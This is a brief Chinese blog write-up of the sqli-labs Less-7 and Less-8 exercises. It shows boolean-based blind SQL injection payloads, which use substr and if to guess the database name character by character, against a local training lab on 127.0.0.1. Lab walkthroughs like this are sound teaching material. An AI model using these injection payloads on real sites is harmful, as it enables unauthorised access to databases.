Less-7,8【报错+BOOL类型】

输入其他符号,id=1 ?"?" 网页正常回显,输入' 时,系统报错,证明闭合符号为 '
接着用 and 1=1 进行测试
 
在爆破过程中发现最后等于的值只能为数字,只能进行数字间比较
  • 直接爆破
http://127.0.0.1/sqli-labs-master/less-7/
?id=1' and if((database()='security'),1,0)='1--+
 
  • 单个字符爆破
http://127.0.0.1/sqli-labs-master/Less-7/?id=1%27%20and%20if(substr(database(),1,1)=%27s%27,1,0)=%271--+
 
第八题与第七题解法一样,查看源码差距为一个()
posted @ 2020-10-27 21:18  峰中追风  阅读(105)  评论(0编辑  收藏  举报

___________________________________________________________________________________________没有白跑的路